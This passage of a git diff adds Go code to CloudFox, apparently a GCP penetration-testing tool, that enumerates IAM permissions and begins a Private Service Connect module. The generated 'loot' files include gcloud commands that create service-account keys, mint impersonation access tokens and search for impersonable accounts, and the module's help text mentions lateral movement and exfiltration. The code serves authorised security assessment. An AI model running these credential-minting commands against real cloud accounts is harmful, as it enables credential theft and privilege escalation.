or project + switch perm.ResourceType { + case "organization": + orgPerms = append(orgPerms, exploded) + case "folder": + folderPerms = append(folderPerms, exploded) + default: + projectPerms = append(projectPerms, exploded) + } + } + } + + m.mu.Lock() + // Store per-project permissions + m.ProjectPerms[projectID] = append(m.ProjectPerms[projectID], projectPerms...) + + // Store org-level permissions (keyed by org ID) + for _, ep := range orgPerms { + m.OrgPerms[ep.ResourceScopeID] = append(m.OrgPerms[ep.ResourceScopeID], ep) + } + + // Store folder-level permissions (keyed by folder ID) + for _, ep := range folderPerms { + m.FolderPerms[ep.ResourceScopeID] = append(m.FolderPerms[ep.ResourceScopeID], ep) + } + + // Legacy aggregated fields for stats + m.EntityPermissions = append(m.EntityPermissions, entityPerms...) + m.GroupInfos = append(m.GroupInfos, groupInfos...) + + // Generate loot per-scope based on exploded permissions + // We use a set to track which service accounts we've already added per scope + addedSAsOrg := make(map[string]map[string]bool) // orgID -> email -> added + addedSAsFolder := make(map[string]map[string]bool) // folderID -> email -> added + addedSAsProject := make(map[string]map[string]bool) // projectID -> email -> added + + allPerms := append(append(projectPerms, orgPerms...), folderPerms...) + for _, ep := range allPerms { + if ep.EntityType != "ServiceAccount" { + continue + } + m.addPermissionToLoot(ep, addedSAsOrg, addedSAsFolder, addedSAsProject) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Exploded %d permission entries in project %s", len(projectPerms), projectID), globals.GCP_PERMISSIONS_MODULE_NAME) + } +} + +func (m *PermissionsModule) getScopeName(scopeType, scopeID string) string { + switch scopeType { + case "project": + return m.GetProjectName(scopeID) + case "organization": + if name, ok := m.OrgNames[scopeID]; ok { + return name + } + return scopeID + case "folder": + return scopeID // Could be enhanced to lookup folder names + default: + return scopeID + } +} + +func parseConditionTitle(condition string) string { + // Try to extract title from condition if it looks like a struct + if strings.Contains(condition, "title:") { + parts := strings.Split(condition, "title:") + if len(parts) > 1 { + titlePart := strings.TrimSpace(parts[1]) + if idx := strings.Index(titlePart, " "); idx > 0 { + return titlePart[:idx] + } + return titlePart + } + } + return "" +} + +// ------------------------------ +// Loot File Management +// ------------------------------ + +// addPermissionToLoot adds a service account to the appropriate scope-based loot file. +// It tracks which SAs have been added per scope to avoid duplicates. +func (m *PermissionsModule) addPermissionToLoot(ep ExplodedPermission, + addedSAsOrg map[string]map[string]bool, + addedSAsFolder map[string]map[string]bool, + addedSAsProject map[string]map[string]bool) { + + if ep.EntityType != "ServiceAccount" { + return + } + + scopeType := ep.ResourceScopeType + scopeID := ep.ResourceScopeID + email := ep.EntityEmail + + // Determine which loot file and tracking map to use + var lootFile *internal.LootFile + var addedSet map[string]bool + + switch scopeType { + case "organization": + if m.OrgLoot[scopeID] == nil { + m.OrgLoot[scopeID] = &internal.LootFile{ + Name: "permissions-commands", + Contents: "# GCP Permissions Commands (Organization Level)\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + lootFile = m.OrgLoot[scopeID] + if addedSAsOrg[scopeID] == nil { + addedSAsOrg[scopeID] = make(map[string]bool) + } + addedSet = addedSAsOrg[scopeID] + + case "folder": + if m.FolderLoot[scopeID] == nil { + m.FolderLoot[scopeID] = &internal.LootFile{ + Name: "permissions-commands", + Contents: "# GCP Permissions Commands (Folder Level)\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + lootFile = m.FolderLoot[scopeID] + if addedSAsFolder[scopeID] == nil { + addedSAsFolder[scopeID] = make(map[string]bool) + } + addedSet = addedSAsFolder[scopeID] + + default: // project + if m.ProjectLoot[scopeID] == nil { + m.ProjectLoot[scopeID] = &internal.LootFile{ + Name: "permissions-commands", + Contents: "# GCP Permissions Commands (Project Level)\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + lootFile = m.ProjectLoot[scopeID] + if addedSAsProject[scopeID] == nil { + addedSAsProject[scopeID] = make(map[string]bool) + } + addedSet = addedSAsProject[scopeID] + } + + // Skip if already added to this scope + if addedSet[email] { + return + } + addedSet[email] = true + + // Extract project from SA email for commands + saProject := ep.EffectiveProject + if saProject == "" { + // Try to extract from email + parts := strings.Split(email, "@") + if len(parts) == 2 { + saParts := strings.Split(parts[1], ".") + if len(saParts) >= 1 { + saProject = saParts[0] + } + } + } + + // Add service account commands + highPriv := "" + if ep.IsHighPrivilege { + highPriv = " [HIGH PRIVILEGE]" + } + + lootFile.Contents += fmt.Sprintf( + "# Service Account: %s%s\n"+ + "# Role: %s (at %s/%s)\n", + email, highPriv, + ep.Role, scopeType, scopeID, + ) + + lootFile.Contents += fmt.Sprintf( + "gcloud iam service-accounts describe %s --project=%s\n"+ + "gcloud iam service-accounts keys list --iam-account=%s --project=%s\n"+ + "gcloud iam service-accounts get-iam-policy %s --project=%s\n"+ + "gcloud iam service-accounts keys create ./key.json --iam-account=%s --project=%s\n"+ + "gcloud auth print-access-token --impersonate-service-account=%s\n\n", + email, saProject, + email, saProject, + email, saProject, + email, saProject, + email, + ) +} + +// isHighPrivilegePermission checks if a permission is considered high-privilege +func isHighPrivilegePermission(permission string) bool { + for _, prefix := range highPrivilegePermissionPrefixes { + if strings.HasPrefix(permission, prefix) { + return true + } + } + return false +} + +// initializeEnumerationLoot initializes the enumeration loot file +func (m *PermissionsModule) initializeEnumerationLoot() { + m.EnumLoot.Contents = "# GCP Permissions Enumeration Commands\n" + m.EnumLoot.Contents += "# Generated by CloudFox\n" + m.EnumLoot.Contents += "# WARNING: Only use with proper authorization\n\n" +} + +// collectAllLootFiles collects all loot files for org-level output (all scopes combined) +func (m *PermissionsModule) collectAllLootFiles() []internal.LootFile { + var lootFiles []internal.LootFile + + // Combine all org, folder, and project loot into one file for org-level output + combinedLoot := &internal.LootFile{ + Name: "permissions-commands", + Contents: "# GCP Permissions Commands (All Scopes)\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + + // Add org-level loot + for orgID, loot := range m.OrgLoot { + if loot != nil && loot.Contents != "" { + combinedLoot.Contents += fmt.Sprintf("# === Organization: %s ===\n", orgID) + // Skip the header line from the individual loot + lines := strings.Split(loot.Contents, "\n") + for i, line := range lines { + if i >= 2 { // Skip first 2 header lines + combinedLoot.Contents += line + "\n" + } + } + } + } + + // Add folder-level loot + for folderID, loot := range m.FolderLoot { + if loot != nil && loot.Contents != "" { + combinedLoot.Contents += fmt.Sprintf("# === Folder: %s ===\n", folderID) + lines := strings.Split(loot.Contents, "\n") + for i, line := range lines { + if i >= 2 { + combinedLoot.Contents += line + "\n" + } + } + } + } + + // Add project-level loot + for projectID, loot := range m.ProjectLoot { + if loot != nil && loot.Contents != "" { + combinedLoot.Contents += fmt.Sprintf("# === Project: %s ===\n", projectID) + lines := strings.Split(loot.Contents, "\n") + for i, line := range lines { + if i >= 2 { + combinedLoot.Contents += line + "\n" + } + } + } + } + + // Only add if there's actual content beyond the header + if len(combinedLoot.Contents) > 60 { // More than just the header + lootFiles = append(lootFiles, *combinedLoot) + } + + // Add enumeration loot file + if m.EnumLoot != nil && m.EnumLoot.Contents != "" { + lootFiles = append(lootFiles, *m.EnumLoot) + } + + return lootFiles +} + +// collectLootFilesForProject collects loot files for a specific project with inheritance. +// This includes: org-level loot + ancestor folder loot + project-level loot +func (m *PermissionsModule) collectLootFilesForProject(projectID string) []internal.LootFile { + var lootFiles []internal.LootFile + + combinedLoot := &internal.LootFile{ + Name: "permissions-commands", + Contents: "# GCP Permissions Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + + // Get ancestry for this project + var projectOrgID string + var ancestorFolders []string + if m.OrgCache != nil && m.OrgCache.IsPopulated() { + projectOrgID = m.OrgCache.GetProjectOrgID(projectID) + ancestorFolders = m.OrgCache.GetProjectAncestorFolders(projectID) + } + + // Add org-level loot if this project belongs to an org + if projectOrgID != "" { + if loot, ok := m.OrgLoot[projectOrgID]; ok && loot != nil && loot.Contents != "" { + combinedLoot.Contents += fmt.Sprintf("# === Inherited from Organization: %s ===\n", projectOrgID) + lines := strings.Split(loot.Contents, "\n") + for i, line := range lines { + if i >= 2 { + combinedLoot.Contents += line + "\n" + } + } + } + } + + // Add folder-level loot for ancestor folders (in order from org to project) + // Reverse the slice to go from org-level folders to project-level folders + for i := len(ancestorFolders) - 1; i >= 0; i-- { + folderID := ancestorFolders[i] + if loot, ok := m.FolderLoot[folderID]; ok && loot != nil && loot.Contents != "" { + combinedLoot.Contents += fmt.Sprintf("# === Inherited from Folder: %s ===\n", folderID) + lines := strings.Split(loot.Contents, "\n") + for i, line := range lines { + if i >= 2 { + combinedLoot.Contents += line + "\n" + } + } + } + } + + // Add project-level loot + if loot, ok := m.ProjectLoot[projectID]; ok && loot != nil && loot.Contents != "" { + combinedLoot.Contents += fmt.Sprintf("# === Project: %s ===\n", projectID) + lines := strings.Split(loot.Contents, "\n") + for i, line := range lines { + if i >= 2 { + combinedLoot.Contents += line + "\n" + } + } + } + + // Only add if there's actual content beyond the header + if len(combinedLoot.Contents) > 50 { + lootFiles = append(lootFiles, *combinedLoot) + } + + return lootFiles +} + +// generateEnumerationLoot generates commands to enumerate permissions +func (m *PermissionsModule) generateEnumerationLoot() { + loot := m.EnumLoot + + // Add organization-level enumeration commands + for _, orgID := range m.OrgIDs { + orgName := m.OrgNames[orgID] + loot.Contents += fmt.Sprintf("# =============================================================================\n") + loot.Contents += fmt.Sprintf("# Organization: %s (%s)\n", orgName, orgID) + loot.Contents += fmt.Sprintf("# =============================================================================\n\n") + + loot.Contents += fmt.Sprintf("# List all IAM bindings for organization\n") + loot.Contents += fmt.Sprintf("gcloud organizations get-iam-policy %s --format=json\n\n", orgID) + + loot.Contents += fmt.Sprintf("# List all roles and their members at organization level\n") + loot.Contents += fmt.Sprintf("gcloud organizations get-iam-policy %s --format=json | jq -r '.bindings[] | \"Role: \\(.role)\\nMembers: \\(.members | join(\", \"))\\n\"'\n\n", orgID) + + loot.Contents += fmt.Sprintf("# Get permissions for a specific role (replace ROLE_NAME)\n") + loot.Contents += fmt.Sprintf("gcloud iam roles describe ROLE_NAME --format=json | jq -r '.includedPermissions[]'\n\n") + } + + // Add project-level enumeration commands + for _, projectID := range m.ProjectIDs { + projectName := m.GetProjectName(projectID) + loot.Contents += fmt.Sprintf("# =============================================================================\n") + loot.Contents += fmt.Sprintf("# Project: %s (%s)\n", projectName, projectID) + loot.Contents += fmt.Sprintf("# =============================================================================\n\n") + + loot.Contents += fmt.Sprintf("# List all IAM bindings for project\n") + loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json\n\n", projectID) + + loot.Contents += fmt.Sprintf("# List all roles and their members at project level\n") + loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | \"Role: \\(.role)\\nMembers: \\(.members | join(\", \"))\\n\"'\n\n", projectID) + + loot.Contents += fmt.Sprintf("# Find all entities with a specific role (replace ROLE_NAME, e.g., roles/owner)\n") + loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.role == \"ROLE_NAME\") | .members[]'\n\n", projectID) + + loot.Contents += fmt.Sprintf("# Get all roles for a specific entity (replace ENTITY, e.g., user:email@example.com)\n") + loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains(\"ENTITY\")) | .role'\n\n", projectID) + + loot.Contents += fmt.Sprintf("# List all service accounts and their IAM policy\n") + loot.Contents += fmt.Sprintf("for sa in $(gcloud iam service-accounts list --project=%s --format='value(email)'); do echo \"=== $sa ===\"; gcloud iam service-accounts get-iam-policy $sa --project=%s --format=json 2>/dev/null | jq -r '.bindings[] | \"\\(.role): \\(.members | join(\", \"))\"' 2>/dev/null || echo \"No IAM policy\"; done\n\n", projectID, projectID) + + loot.Contents += fmt.Sprintf("# List all custom roles with their permissions\n") + loot.Contents += fmt.Sprintf("for role in $(gcloud iam roles list --project=%s --format='value(name)'); do echo \"=== $role ===\"; gcloud iam roles describe $role --project=%s --format=json | jq -r '.includedPermissions[]' 2>/dev/null; done\n\n", projectID, projectID) + + loot.Contents += fmt.Sprintf("# Get permissions for a predefined role\n") + loot.Contents += fmt.Sprintf("gcloud iam roles describe roles/editor --format=json | jq -r '.includedPermissions[]'\n\n") + } + + // Add entity-specific enumeration based on discovered permissions + loot.Contents += fmt.Sprintf("# =============================================================================\n") + loot.Contents += fmt.Sprintf("# Entity-Specific Permission Enumeration\n") + loot.Contents += fmt.Sprintf("# =============================================================================\n\n") + + // Collect unique entities with their roles + entityRoles := make(map[string]map[string]bool) // entity -> set of roles + entityTypes := make(map[string]string) // entity -> type + + allPerms := m.getAllExplodedPerms() + for _, ep := range allPerms { + if ep.EntityEmail == "" { + continue + } + if entityRoles[ep.EntityEmail] == nil { + entityRoles[ep.EntityEmail] = make(map[string]bool) + } + entityRoles[ep.EntityEmail][ep.Role] = true + entityTypes[ep.EntityEmail] = ep.EntityType + } + + // Generate commands for each entity type + for entity, roles := range entityRoles { + entityType := entityTypes[entity] + + // Convert roles set to slice + var roleList []string + for role := range roles { + roleList = append(roleList, role) + } + sort.Strings(roleList) + + switch entityType { + case "ServiceAccount": + loot.Contents += fmt.Sprintf("# Service Account: %s\n", entity) + loot.Contents += fmt.Sprintf("# Current Roles: %s\n", strings.Join(roleList, ", ")) + + // Extract project from SA email + saProject := "" + parts := strings.Split(entity, "@") + if len(parts) == 2 { + saParts := strings.Split(parts[1], ".") + if len(saParts) >= 1 { + saProject = saParts[0] + } + } + + if saProject != "" { + loot.Contents += fmt.Sprintf("# Describe service account\n") + loot.Contents += fmt.Sprintf("gcloud iam service-accounts describe %s --project=%s --format=json\n", entity, saProject) + + loot.Contents += fmt.Sprintf("# Get IAM policy on the service account itself\n") + loot.Contents += fmt.Sprintf("gcloud iam service-accounts get-iam-policy %s --project=%s --format=json\n", entity, saProject) + } + + loot.Contents += fmt.Sprintf("# Get all permissions for each role\n") + for _, role := range roleList { + if strings.HasPrefix(role, "projects/") || strings.HasPrefix(role, "organizations/") { + // Custom role - need to describe with full path + loot.Contents += fmt.Sprintf("gcloud iam roles describe %s --format=json | jq -r '.includedPermissions[]'\n", role) + } else { + loot.Contents += fmt.Sprintf("gcloud iam roles describe %s --format=json | jq -r '.includedPermissions[]'\n", role) + } + } + loot.Contents += "\n" + + case "User": + loot.Contents += fmt.Sprintf("# User: %s\n", entity) + loot.Contents += fmt.Sprintf("# Current Roles: %s\n", strings.Join(roleList, ", ")) + + loot.Contents += fmt.Sprintf("# Get all permissions for each role\n") + for _, role := range roleList { + if strings.HasPrefix(role, "projects/") || strings.HasPrefix(role, "organizations/") { + loot.Contents += fmt.Sprintf("gcloud iam roles describe %s --format=json | jq -r '.includedPermissions[]'\n", role) + } else { + loot.Contents += fmt.Sprintf("gcloud iam roles describe %s --format=json | jq -r '.includedPermissions[]'\n", role) + } + } + loot.Contents += "\n" + + case "Group": + loot.Contents += fmt.Sprintf("# Group: %s\n", entity) + loot.Contents += fmt.Sprintf("# Current Roles: %s\n", strings.Join(roleList, ", ")) + + loot.Contents += fmt.Sprintf("# Get all permissions for each role\n") + for _, role := range roleList { + if strings.HasPrefix(role, "projects/") || strings.HasPrefix(role, "organizations/") { + loot.Contents += fmt.Sprintf("gcloud iam roles describe %s --format=json | jq -r '.includedPermissions[]'\n", role) + } else { + loot.Contents += fmt.Sprintf("gcloud iam roles describe %s --format=json | jq -r '.includedPermissions[]'\n", role) + } + } + loot.Contents += "\n" + } + } + + // Add high-privilege permission search commands + loot.Contents += fmt.Sprintf("# =============================================================================\n") + loot.Contents += fmt.Sprintf("# High-Privilege Permission Search\n") + loot.Contents += fmt.Sprintf("# =============================================================================\n\n") + + loot.Contents += fmt.Sprintf("# Find entities with setIamPolicy permissions\n") + for _, projectID := range m.ProjectIDs { + loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.role | test(\"admin|owner|editor\"; \"i\")) | \"\\(.role): \\(.members | join(\", \"))\"'\n", projectID) + } + loot.Contents += "\n" + + loot.Contents += fmt.Sprintf("# Find service accounts that can be impersonated\n") + for _, projectID := range m.ProjectIDs { + loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.role | test(\"serviceAccountUser|serviceAccountTokenCreator\"; \"i\")) | \"\\(.role): \\(.members | join(\", \"))\"'\n", projectID) + } + loot.Contents += "\n" +} + +// PermFederatedIdentityInfo contains parsed information about a federated identity +type PermFederatedIdentityInfo struct { + IsFederated bool + ProviderType string // AWS, GitHub, GitLab, OIDC, SAML, Azure, etc. + PoolName string + Subject string + Attribute string +} + +// parsePermFederatedIdentity detects and parses federated identity principals +func parsePermFederatedIdentity(identity string) PermFederatedIdentityInfo { + info := PermFederatedIdentityInfo{} + + // Check for principal:// or principalSet:// format + if !strings.HasPrefix(identity, "principal://") && !strings.HasPrefix(identity, "principalSet://") { + return info + } + + info.IsFederated = true + + // Extract pool name if present + if strings.Contains(identity, "workloadIdentityPools/") { + parts := strings.Split(identity, "workloadIdentityPools/") + if len(parts) > 1 { + poolParts := strings.Split(parts[1], "/") + if len(poolParts) > 0 { + info.PoolName = poolParts[0] + } + } + } + + // Detect provider type based on common patterns + identityLower := strings.ToLower(identity) + + switch { + case strings.Contains(identityLower, "aws") || strings.Contains(identityLower, "amazon"): + info.ProviderType = "AWS" + case strings.Contains(identityLower, "github"): + info.ProviderType = "GitHub" + case strings.Contains(identityLower, "gitlab"): + info.ProviderType = "GitLab" + case strings.Contains(identityLower, "azure") || strings.Contains(identityLower, "microsoft"): + info.ProviderType = "Azure" + case strings.Contains(identityLower, "okta"): + info.ProviderType = "Okta" + case strings.Contains(identityLower, "bitbucket"): + info.ProviderType = "Bitbucket" + case strings.Contains(identityLower, "circleci"): + info.ProviderType = "CircleCI" + case strings.Contains(identity, "attribute."): + info.ProviderType = "OIDC" + default: + info.ProviderType = "Federated" + } + + // Extract subject if present + // Format: .../subject/{subject} + if strings.Contains(identity, "/subject/") { + parts := strings.Split(identity, "/subject/") + if len(parts) > 1 { + info.Subject = parts[1] + } + } + + // Extract attribute and value if present + // Format: .../attribute.{attr}/{value} + if strings.Contains(identity, "/attribute.") { + parts := strings.Split(identity, "/attribute.") + if len(parts) > 1 { + attrParts := strings.Split(parts[1], "/") + if len(attrParts) >= 1 { + info.Attribute = attrParts[0] + } + if len(attrParts) >= 2 { + // The value is the specific identity (e.g., repo name) + info.Subject = attrParts[1] + } + } + } + + return info +} + +// formatPermFederatedInfo formats federated identity info for display +func formatPermFederatedInfo(info PermFederatedIdentityInfo) string { + if !info.IsFederated { + return "-" + } + + result := info.ProviderType + + // Show subject (specific identity like repo/workflow) if available + if info.Subject != "" { + result += ": " + info.Subject + } else if info.Attribute != "" { + result += " [" + info.Attribute + "]" + } + + // Add pool name in parentheses + if info.PoolName != "" { + result += " (pool: " + info.PoolName + ")" + } + + return result +} + +// formatCondition formats a condition for display +func formatPermissionCondition(hasCondition bool, condition, conditionTitle string) string { + if !hasCondition { + return "No" + } + + if conditionTitle != "" { + return conditionTitle + } + + // Parse common patterns + if strings.Contains(condition, "request.time") { + return "[time-limited]" + } + if strings.Contains(condition, "resource.name") { + return "[resource-scoped]" + } + if strings.Contains(condition, "origin.ip") || strings.Contains(condition, "request.origin") { + return "[IP-restricted]" + } + if strings.Contains(condition, "device") { + return "[device-policy]" + } + + return "Yes" +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Log findings first + allPerms := m.getAllExplodedPerms() + highPrivCount := 0 + crossProjectCount := 0 + for _, ep := range allPerms { + if ep.IsHighPrivilege { + highPrivCount++ + } + if ep.IsCrossProject { + crossProjectCount++ + } + } + + if highPrivCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d high-privilege permission entries!", highPrivCount), globals.GCP_PERMISSIONS_MODULE_NAME) + } + if crossProjectCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d cross-project permission entries!", crossProjectCount), globals.GCP_PERMISSIONS_MODULE_NAME) + } + + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *PermissionsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + header := m.getTableHeader() + + // Determine org ID - prefer discovered orgs, fall back to hierarchy + orgID := "" + if len(m.OrgIDs) > 0 { + orgID = m.OrgIDs[0] + } else if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } + + // Collect all loot files for org-level output + allLootFiles := m.collectAllLootFiles() + + // Get all permissions for output + allPerms := m.getAllExplodedPerms() + + // Check if we should use single-pass tee streaming for large datasets + if orgID != "" && len(allPerms) >= 50000 { + m.writeHierarchicalOutputTee(ctx, logger, orgID, header, allPerms, allLootFiles) + return + } + + // Standard output path for smaller datasets + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + if orgID != "" { + // DUAL OUTPUT: Complete aggregated output at org level + body := m.permsToTableBody(allPerms) + tables := []internal.TableFile{{ + Name: "permissions", + Header: header, + Body: body, + }} + outputData.OrgLevelData[orgID] = PermissionsOutput{Table: tables, Loot: allLootFiles} + + // DUAL OUTPUT: Filtered per-project output with inherited loot + for projectID, perms := range m.ProjectPerms { + if len(perms) == 0 { + continue + } + body := m.permsToTableBody(perms) + tables := []internal.TableFile{{ + Name: "permissions", + Header: header, + Body: body, + }} + // Get loot for this project with inheritance (org + folders + project) + projectLoot := m.collectLootFilesForProject(projectID) + outputData.ProjectLevelData[projectID] = PermissionsOutput{Table: tables, Loot: projectLoot} + } + } else if len(m.ProjectIDs) > 0 { + // FALLBACK: No org discovered, output complete data to first project + body := m.permsToTableBody(allPerms) + tables := []internal.TableFile{{ + Name: "permissions", + Header: header, + Body: body, + }} + outputData.ProjectLevelData[m.ProjectIDs[0]] = PermissionsOutput{Table: tables, Loot: allLootFiles} + } + + // Create path builder using the module's hierarchy + pathBuilder := m.BuildPathBuilder() + + // Write using hierarchical output + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_PERMISSIONS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeHierarchicalOutputTee uses single-pass streaming for large datasets. +// It streams through all permissions once, writing each row to: +// 1. The org-level output (always) +// 2. The appropriate project-level output based on EffectiveProject +func (m *PermissionsModule) writeHierarchicalOutputTee(ctx context.Context, logger internal.Logger, orgID string, header []string, allPerms []ExplodedPermission, lootFiles []internal.LootFile) { + logger.InfoM(fmt.Sprintf("Using single-pass tee streaming for %d permissions", len(allPerms)), globals.GCP_PERMISSIONS_MODULE_NAME) + + pathBuilder := m.BuildPathBuilder() + + // Build the table data + body := m.permsToTableBody(allPerms) + tables := []internal.TableFile{{ + Name: "permissions", + Header: header, + Body: body, + }} + + // Build reverse lookup: for each folder, which projects are under it + // This allows O(1) lookup during row routing + folderToProjects := make(map[string][]string) + orgToProjects := make(map[string][]string) + + if m.OrgCache != nil && m.OrgCache.IsPopulated() { + for _, projectID := range m.ProjectIDs { + // Get the org this project belongs to + projectOrgID := m.OrgCache.GetProjectOrgID(projectID) + if projectOrgID != "" { + orgToProjects[projectOrgID] = append(orgToProjects[projectOrgID], projectID) + } + + // Get all ancestor folders for this project + ancestorFolders := m.OrgCache.GetProjectAncestorFolders(projectID) + for _, folderID := range ancestorFolders { + folderToProjects[folderID] = append(folderToProjects[folderID], projectID) + } + } + } + + // Create a row router that routes based on scope type and OrgCache + rowRouter := func(row []string) []string { + // Row format: [ScopeType, ScopeID, ScopeName, EntityType, Identity, Permission, ...] + scopeType := row[0] + scopeID := row[1] + + switch scopeType { + case "project": + // Direct project permission - route to that project only + return []string{scopeID} + case "organization": + // Org permission - route to all projects under this org + if projects, ok := orgToProjects[scopeID]; ok { + return projects + } + // Fallback if OrgCache not populated: route to all projects + return m.ProjectIDs + case "folder": + // Folder permission - route to all projects under this folder + if projects, ok := folderToProjects[scopeID]; ok { + return projects + } + // Fallback if folder not in cache: route to all projects + return m.ProjectIDs + default: + return nil + } + } + + // Use the tee streaming function + config := internal.TeeStreamingConfig{ + OrgID: orgID, + ProjectIDs: m.ProjectIDs, + Tables: tables, + LootFiles: lootFiles, + ProjectLootCollector: m.collectLootFilesForProject, + RowRouter: rowRouter, + PathBuilder: pathBuilder, + Format: m.Format, + Verbosity: m.Verbosity, + Wrap: m.WrapTable, + } + + err := internal.HandleHierarchicalOutputTee(config) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing tee streaming output: %v", err), globals.GCP_PERMISSIONS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *PermissionsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + header := m.getTableHeader() + allPerms := m.getAllExplodedPerms() + body := m.permsToTableBody(allPerms) + + // Sort by scope type (org first, then folder, then project), then entity, then permission + scopeOrder := map[string]int{"organization": 0, "folder": 1, "project": 2} + sort.Slice(body, func(i, j int) bool { + if body[i][0] != body[j][0] { + return scopeOrder[body[i][0]] < scopeOrder[body[j][0]] + } + if body[i][4] != body[j][4] { + return body[i][4] < body[j][4] + } + return body[i][5] < body[j][5] + }) + + // Collect all loot files for flat output + lootFiles := m.collectAllLootFiles() + + tables := []internal.TableFile{{ + Name: "permissions", + Header: header, + Body: body, + }} + + output := PermissionsOutput{ + Table: tables, + Loot: lootFiles, + } + + // Determine output scope - use org if available, otherwise fall back to project + var scopeType string + var scopeIdentifiers []string + var scopeNames []string + + if len(m.OrgIDs) > 0 { + scopeType = "organization" + for _, orgID := range m.OrgIDs { + scopeIdentifiers = append(scopeIdentifiers, orgID) + if name, ok := m.OrgNames[orgID]; ok && name != "" { + scopeNames = append(scopeNames, name) + } else { + scopeNames = append(scopeNames, orgID) + } + } + } else { + scopeType = "project" + scopeIdentifiers = m.ProjectIDs + for _, id := range m.ProjectIDs { + scopeNames = append(scopeNames, m.GetProjectName(id)) + } + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + scopeType, + scopeIdentifiers, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_PERMISSIONS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// getTableHeader returns the permissions table header +func (m *PermissionsModule) getTableHeader() []string { + return []string{ + "Scope Type", + "Scope ID", + "Scope Name", + "Entity Type", + "Identity", + "Permission", + "Role", + "Custom Role", + "Inherited", + "Inherited From", + "Condition", + "Cross-Project", + "High Privilege", + "Federated", + } +} + +// permsToTableBody converts permissions to table body rows +func (m *PermissionsModule) permsToTableBody(perms []ExplodedPermission) [][]string { + var body [][]string + for _, ep := range perms { + isCustom := "No" + if ep.RoleType == "custom" || strings.HasPrefix(ep.Role, "projects/") || strings.HasPrefix(ep.Role, "organizations/") { + isCustom = "Yes" + } + + inherited := "No" + if ep.IsInherited { + inherited = "Yes" + } + + inheritedFrom := "-" + if ep.IsInherited && ep.InheritedFrom != "" { + inheritedFrom = ep.InheritedFrom + } + + condition := formatPermissionCondition(ep.HasCondition, ep.Condition, ep.ConditionTitle) + + crossProject := "No" + if ep.IsCrossProject { + crossProject = fmt.Sprintf("Yes (from %s)", ep.SourceProject) + } + + highPriv := "No" + if ep.IsHighPrivilege { + highPriv = "Yes" + } + + // Check for federated identity + federated := formatPermFederatedInfo(parsePermFederatedIdentity(ep.EntityEmail)) + + body = append(body, []string{ + ep.ResourceScopeType, + ep.ResourceScopeID, + ep.ResourceScopeName, + ep.EntityType, + ep.EntityEmail, + ep.Permission, + ep.Role, + isCustom, + inherited, + inheritedFrom, + condition, + crossProject, + highPriv, + federated, + }) + } + return body +} diff --git a/gcp/commands/privateserviceconnect.go b/gcp/commands/privateserviceconnect.go new file mode 100644 index 00000000..9a2dca4c --- /dev/null +++ b/gcp/commands/privateserviceconnect.go @@ -0,0 +1,558 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + networkendpointsservice "github.com/BishopFox/cloudfox/gcp/services/networkEndpointsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPPrivateServiceConnectCommand = &cobra.Command{ + Use: "private-service-connect", + Aliases: []string{"psc", "private-endpoints", "internal-endpoints"}, + Short: "Enumerate Private Service Connect endpoints and service attachments", + Long: `Enumerate Private Service Connect (PSC) endpoints, private connections, and service attachments. + +Private Service Connect allows private connectivity to Google APIs and services, +as well as to services hosted by other organizations. + +Security Relevance: +- PSC endpoints provide internal network paths to external services +- Service attachments expose internal services to other projects +- Private connections (VPC peering for managed services) provide access to Cloud SQL, etc. +- These can be used for lateral movement or data exfiltration + +What this module finds: +- PSC forwarding rules (consumer endpoints) +- Service attachments (producer endpoints) +- Private service connections (e.g., to Cloud SQL private IPs) +- Connection acceptance policies (auto vs manual) + +Output includes nmap commands for scanning internal endpoints.`, + Run: runGCPPrivateServiceConnectCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type PrivateServiceConnectModule struct { + gcpinternal.BaseGCPModule + + 